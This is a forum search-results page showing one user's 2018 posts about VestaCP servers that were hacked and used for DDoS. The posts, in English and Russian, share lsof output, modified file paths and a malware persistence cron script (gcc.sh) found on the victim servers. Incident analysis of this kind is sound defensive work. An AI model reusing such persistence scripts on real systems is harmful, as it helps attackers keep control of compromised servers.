We are happy to announce that Vesta is back under active development as of 25 February 2024. We are working on v1 candidate and expect to engage more with the community over the coming months. We are committed to open source, and we encourage contributors to help us build the future of Vesta.
Search found 33 matches
- Sun Apr 08, 2018 9:55 am
- Forum: General Discussion
- Topic: Got 10 VestaCP servers exploited
- Replies: 548
- Views: 709744
Re: Got 10 VestaCP servers exploited
A few more logs provided by the hosting support at the time when the server was active [root@mail /]# lsof -p 985 COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME update 985 root cwd DIR 182,178001 4096 786628 /usr/share/roundcubemail update 985 root rtd DIR 182,178001 4096 2 / update 985 root txt...
- Sat Apr 07, 2018 8:40 pm
- Forum: General Discussion
- Topic: Got 10 VestaCP servers exploited
- Replies: 548
- Views: 709744
Re: Got 10 VestaCP servers exploited
Moderators: please post instructions how to enable logging in all the web interfaces of Vesta (in nginx or Apache) so that those who find this thread after the hacking could temporarily change their configs of the web server and try to catch the requests from the exploit.
- Sat Apr 07, 2018 8:36 pm
- Forum: General Discussion
- Topic: Got 10 VestaCP servers exploited
- Replies: 548
- Views: 709744
Re: Got 10 VestaCP servers exploited
Just to think: when logging in through the web interface to Vesta, a session file should be created, right? And all of them located in /usr/local/vesta/data/sessions As I understand the web interface internals, PHP will check that we have "user" variable inside the session (https://github.com/serghe...
- Sat Apr 07, 2018 7:14 pm
- Forum: Общие вопросы
- Topic: Возможная уязвимость в Vesta 0.9.8.19
- Replies: 236
- Views: 141562
Re: Возможная уязвимость в Vesta 0.9.8.19
Борьба со следствием уже не так важна, как важно узнать причину заражения. И это никак не слабый пароль.
Давайте перейдём в смежную тему, там больше людей с этой проблемой.
Давайте перейдём в смежную тему, там больше людей с этой проблемой.
- Sat Apr 07, 2018 7:10 pm
- Forum: General Discussion
- Topic: Got 10 VestaCP servers exploited
- Replies: 548
- Views: 709744
Re: Got 10 VestaCP servers exploited
Those posts do explain the virus and its removal. but even after removal it will eventually reappear again because we are still not aware of a vuln which is obviously present somewhere within the system. Once again, I copy the answer from my hoster, which I posted in another topic Одновременно с эт...
- Sat Apr 07, 2018 6:42 pm
- Forum: General Discussion
- Topic: Got 10 VestaCP servers exploited
- Replies: 548
- Views: 709744
Re: Got 10 VestaCP servers exploited
# cat /opt/backup/etc/cron.hourly/gcc.sh #!/bin/sh PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done cp /lib/libudev.so /lib/libudev.so.6 /lib/libudev.so.6 # cat /opt/backup/etc/crontab ...
- Sat Apr 07, 2018 5:27 pm
- Forum: General Discussion
- Topic: Got 10 VestaCP servers exploited
- Replies: 548
- Views: 709744
Re: Got 10 VestaCP servers exploited
Found in /etc/cron.hourly/gcc.sh, modified 04.04.2018 16:25:00 More modified files at the same time: /var/lib/mysql/roundcube/session.ibd /etc/rc.d/rc3.d/S90update -> /etc/init.d/update /etc/rc.d/rc2.d/S90update -> /etc/init.d/update /etc/rc.d/rc1.d/S90update -> /etc/init.d/update /etc/rc.d/init.d/...
- Sat Apr 07, 2018 5:03 pm
- Forum: General Discussion
- Topic: Got 10 VestaCP servers exploited
- Replies: 548
- Views: 709744
Re: Got 10 VestaCP servers exploited
Found in /etc/cron.hourly/gcc.sh, modified 04.04.2018 16:25:00 #!/bin/sh PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done cp /lib/libudev.so /lib/libudev.so.6 /lib/libudev.so.6 I did not...
- Sat Apr 07, 2018 3:58 pm
- Forum: General Discussion
- Topic: Got 10 VestaCP servers exploited
- Replies: 548
- Views: 709744
Re: Got 10 VestaCP servers exploited
Me too. I've created another thread (in russian). But my provider is FastVPS, not OVH.
- Sat Apr 07, 2018 2:38 pm
- Forum: Общие вопросы
- Topic: Возможная уязвимость в Vesta 0.9.8.19
- Replies: 236
- Views: 141562
Возможная уязвимость в Vesta 0.9.8.19
Всем привет. Сегодня столкнулся со странной ситуацией - хостер заблокировал мою VPS из-за ддоса на другие ресурсы. Сначала я не понял в чём суть и запросил подробности и вот их ответ (хостер FastVPS): К большому сожалению, сообщаем, что, сервер был взломан и с него была исходящая сетевая атака на др...